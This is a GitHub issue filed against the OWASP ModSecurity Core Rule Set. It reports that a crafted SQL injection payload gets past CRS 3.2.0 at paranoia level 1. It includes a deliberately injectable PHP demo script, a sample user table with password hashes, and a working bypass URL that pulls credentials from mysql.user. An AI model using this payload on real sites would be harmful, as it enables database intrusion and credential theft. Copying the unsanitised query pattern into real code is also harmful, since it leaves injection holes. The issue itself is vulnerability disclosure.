search

SpiderLabs / owasp-modsecurity-crs

OWASP ModSecurity Core Rule Set (CRS) Project (Official Repository)
https://modsecurity.org/crs
Apache License 2.0
2.44k stars 725 forks source link

SQLi bypass at PL1(CRS 3.2.0) #1727

Open seedis opened 4 years ago

seedis commented 4 years ago

Description

Fuzz found that the following request can bypass modesecurity rules and implement SQLi injection. sample code:user.php(id parameter has SQL injection security issues)

<?php
echo "<head><title>SQL injection demo</title></head>";
$id=$_GET['id'];
$conn=new mysqli('127.0.0.1','root','root','test');
if(!$conn){
    die("Error to connect database!");
    }
    $sql="select username from user where id={$id}";
#   echo "$sql"."</br></br>";
    $res=$conn->query($sql);
    if($res){
        $row=$res->fetch_row();
            echo "\t Hello <b>".htmlspecialchars($row[0])." </b>,having a good day!";
            $res->free();
            $conn->close();
        }
    else{
            echo "<b>error</b>";
        }
?>

Database table contents:

mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from user;
+----+----------+----------------------------------+
| id | username | passwd                           |
+----+----------+----------------------------------+
|  1 | admin    | 21232f297a57a5a743894a0e4a801fc3 |
|  2 | root     | 63a9f0ea7bb98050796b649e85481845 |
|  3 | test     | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
The request is as follows:

Normal request

http://127.0.0.1/user.php?id=1

image evil request: id=1 and 1=1 (blocked by CRS) image request(bypass CRS3.2.0) for SQL injection: 

http://127.0.0.1/user.php?id=@.:=right(right((select authentication_string from mysql.user limit 0,1),1111),1111) union%23%0adistinctrow%0bselect@.

image It can be seen that the user password in the user table in the mysql database is successfully obtained through this bypass method.

Environment

Looking forward to fixing it as soon as possible beacause it threatens the security of the database content.

seedis commented 4 years ago

@dune73 Can you help reproduce this bypass tricks when you have free time(I have added my database structure information above for easy reproduction).Looking forward to your reply, thanks.